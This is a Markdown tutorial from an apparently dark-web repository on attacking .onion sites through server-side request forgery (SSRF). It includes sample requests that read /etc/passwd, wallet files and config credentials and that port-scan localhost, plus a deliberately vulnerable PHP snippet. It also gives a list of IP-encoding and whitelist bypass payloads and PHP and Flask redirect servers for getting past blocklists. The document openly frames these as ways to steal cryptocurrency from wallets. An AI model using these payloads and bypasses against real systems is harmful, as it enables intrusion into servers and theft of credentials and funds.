PentestingDarkWebSites/SSRF.md at master - PentestingDarkWebSites - Darktea: Dark cup of Gitea (Gitea on the Dark Web)

7.0 KiB

Raw Permalink Blame History

SSRF

SSRF is a pretty rad vulenrablitiy, it could allow the attackers to access the local machine. If left vulnerable it could allow the attacker to have acess to local files services and files. Lets say for example that the site that you are targeting has a monero node or their wallet running locally on the server. This means that you have to be on the network to access the service. It should not accessible from the internet. This attack could allow the attackers to have access to local wallets or other services. If the admin has a local server running that allows them to control the server or web app then they attacker might have access to that app or server as well. SSRF could also allow the attackers to port scan the local network.

GET /?url=http://127.0.0.1/admin.php HTTP/1.1
Host: pornhub.onion

The request above is an exampele of what a payload might look like. If it is vulnerable it should respond with a 200 status code.

What makes SSRF so cool is that it could also be used to scan for ports on the local system.

GET /?url=127.0.0.1:22 HTTP/1.1
Host: pornhub.onion

You could create a quicky script that could keep sending requests to the server but increasing the port number. Just lke before, if the page returns with a 200 status then the port is open. This could allow the attackers to figure out what service is running locally. With this information they might be able to exploit a vulnerability, brute force their way. etc. SSRF might also give the attackers the ablity to read local files. They could get read senstive files on the system and use the inforamtion to move deeper in the network.

SSRF can also be used to access local files like the password file or any other files on the system.

The example below are examples of what a request might look like. This one is could allow the attackers to have acces to the wallet keys. Which means they could own all the bitcoins in the wallet.

GET /?url=porn.wallet HTTP/1.1
Host: pornhub.onion

If a wallet file or any other senstive file has a predictable path, hackers might be able to access those files.

This could allow the attackers to have access to any files or any service running locally.

GET /?url=/etc/passwd HTTP/1.1
Host: pornhub.onion

It could be used to get the passwords of the box.

All the attacker has to do is send a GET request to like this: curl http://127.0.0.1:4567/?url=config.json

# config.json 
# on the sites server
{
    "uname": "admin",
    "ip":   "127.0.0.1",
    "pass": "pass"
}

Vulnerable code

<?php

/**
* Check if the 'url' GET variable is set
* Example - http://localhost/?url=http://testphp.vulnweb.com/images/logo.gif
*/
if (isset($_GET['url'])){
$url = $_GET['url'];

/**
* Send a request vulnerable to SSRF since
* no validation is being done on $url
* before sending the request
*/
$image = fopen($url, 'rb');

/**
* Send the correct response headers
*/
header("Content-Type: image/png");

/**
* Dump the contents of the image
*/
fpassthru($image);}

Port scannning

SSRF could also allow the hackers to perform a map of the local network by exploiting a SSRF vulnerablity. All the hacker has to do is create a script that keeps sending requests to a URL that is vulnerable to SSRF and wait for the response. If the response comes back with a 200 HTTP status then it could mean that the port is open. A skilled hacker might be able to pivot and compromised other services that are hosted locally.

Some sites that use cryptocurrencies might connect locally to a node or to a wallet service. This MIGHT be enough for hackers to steal the coins in the wallet.

READ READ READ!

Reading other peoples blogs about bug hunting, or about the topic in general is one of they best ways to learn more. Also practicing is important. There are sites like portswigger that has little practice labs that give you experience exploiting SSRF vulnerablies. There are also sites like: hackthebox that have practice boxes you can practice exploiting or scannning.

You can create your very own lab by using VMs. They have sites like: vulnerablehub that alllows people to create purposely vulnerable VMs that you can set up on your comptuer so you can practice hacking at it. There are a bunch of different types of VMs they have, web hacking , exploiting services, etc..

DVWA is a damn vulnerable wep app that has a bunch of different vulnerablites that are on different levels.

Bypasses ip

Localhost

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

CDIR bypass

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Decimal bypass

http://2130706433/ = http://127.0.0.1
http://017700000001 = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

Hexadecimal bypass

127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20

Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)

http://{domain}@127.0.0.1
http://127.0.0.1#{domain}
http://{domain}.127.0.0.1
http://127.0.0.1/{domain}
http://127.0.0.1/?d={domain}
https://{domain}@127.0.0.1
https://127.0.0.1#{domain}
https://{domain}.127.0.0.1
https://127.0.0.1/{domain}
https://127.0.0.1/?d={domain}
http://{domain}@localhost
http://localhost#{domain}
http://{domain}.localhost
http://localhost/{domain}
http://localhost/?d={domain}
http://127.0.0.1%00{domain}
http://127.0.0.1?{domain}
http://127.0.0.1///{domain}
https://127.0.0.1%00{domain}
https://127.0.0.1?{domain}
https://127.0.0.1///{domain}

Bypassing BlackLists

It might be possible to bypass a Blacklist is to make the server send a request to a web page that you control. The webpage should then redirect to an IP that is BlacListed.

PHP

<?php header("Location:blacklist_ip"); ?>

Flask

import os
from flask import Flask,redirect

app = Flask(__name__)

@app.route('/')
def hello():
    return redirect("http://www.example.com", code=302)

if __name__ == '__main__':
    # Bind to PORT if defined, otherwise default to 5000.
    port = int(os.environ.get('PORT', 5000))
    app.run(host='0.0.0.0', port=port)

Sources